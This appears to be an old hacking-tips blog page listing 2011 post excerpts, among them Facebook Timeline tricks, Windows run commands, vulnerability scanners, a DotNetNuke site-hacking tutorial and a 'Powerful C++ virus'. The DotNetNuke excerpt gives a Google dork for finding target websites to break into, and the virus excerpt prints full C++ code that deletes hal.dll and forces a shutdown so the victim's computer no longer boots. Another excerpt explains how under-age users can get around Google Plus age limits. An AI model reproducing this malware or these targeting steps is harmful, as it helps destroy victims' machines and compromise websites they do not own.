Wednesday, September 28, 2011

get google plus for under-ages

If you are under age then google plus will no allow you to get it now you can try this sign up for a new account of any name then goto plus.google.com then sign up with your original name you cannot operate your g+ from your old one coz you cant change the passow...

Monday, September 26, 2011

Get the new facebook timeline before release

Facebook released a slew of new features, at their f8 conference and the Timeline looks like the shiniest one of the new goodies. Timeline isn't out to us regular users yet but rjcrystal, has found a way to enable Timeline by logging into the social network as a developer. This comes with a friendly warning though - the reason Facebook hasn't released the Timeline is because they're still fixing kinks and you may face bugs if you get Timeline ahead of time.Its officially releasing it on 3rd October 2011 Also, you will only be able to use Timeline on one device. If you open your Facebook account on another computer, Timeline will get disabled on both your machines. Finally, for one of the steps, you'll need to have a verified...

Sunday, September 25, 2011

Information Gathering Techniques and Tools

What is information gathering??Whenever planning an attack it is the is most sole part of it if you fail here then you can’t perform a successful attack on your victim. what is OS fingerprinting??? TCP/IP stack fingerprinting is the passive collection of configuration attributes from a remote device during standard layer 4 network communications. The combination of parameters may then be used to infer the remote machine's operating system (aka, OS fingerprinting), or incorporated into a device fingerprint. IP addresses are the most useful here but what are IP addresses these are the identity of your systems    presence on internet and it is used for communication purposes. # Dynamic IP- these are...

Run Commands: Quote: compmgmt.msc - Computer management devmgmt.msc - Device manager diskmgmt.msc - Disk management dfrg.msc - Disk defrag eventvwr.msc - Event viewer fsmgmt.msc - Shared folders gpedit.msc - Group policies lusrmgr.msc - Local users and groups perfmon.msc - Performance monitor rsop.msc - Resultant set of policies secpol.msc - Local security settings services.msc - Various Services msconfig - System Configuration Utility regedit - Registry Editor msinfo32 _ System Information sysedit _ System Edit win.ini _ windows loading information(also system.ini) winver _ Shows current version of windows mailto: _ Opens default email client command _ Opens command prompt Run Commands to access the control panel: Quote: Add/Remove Programs control appwiz.cpl Date/Time Properties control...

Thursday, September 22, 2011

Web vunerablity scanning tools

Web site security is very important because the website contain relevant information about a company and now a days website defacement is very common even a script kiddies and a new born hackers can do this. The most common vulnerability like SQL-Injection and cross site scripting lead towards the defacement.  So you want to secure your web application than find vulnerabilities on it before a hacker find it, try to use some relevant tools and find vulnerabilities and fix it. There are so many tools available for both Windows and Linux platform and commercial and open source tool. Below is the best web vulnerability scanner tool that we have discussed before.OWASP Zed Attack Proxy ZAPOWASP or Open Web Application Security Project is a non profit organisation world wide...

installing IPv6

IPv4 was a great sucess and after it now IPv6 has been released which supports hexadecimal notation and in future it will also support audio and video its said like that... To install its bit easy goto start>run>cmd> in command type ipv6 install&nb...

DNN (DotNetNuke) Hacking

Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.Below are the easy steps to implement the attack:First use a google dork to find the appropriate target. inurl:”/portals/0″ site:.comYou can change com to your desired domain name like bd ph ae Now search your website on the google after...

Powerfull C++ virus

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.Warning: Do not try this on your home computer.The Original Code:Code:#include#includeusing namespace std;int main(int argc, char *argv[]){std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIMEsystem(“shutdown -s -r”);system(“PAUSE”);return EXIT_SUCCESS;}A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:Code:#include#includeusing namespace std;int main(int argc, char *argv[]){std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIMEsystem(“shutdown -s -r”);system(“PAUSE”);return EXIT_SUCCESS;}The second version would be more useful during times when you do not know the victims...

Twitter Delicious Facebook Digg Stumbleupon Favorites More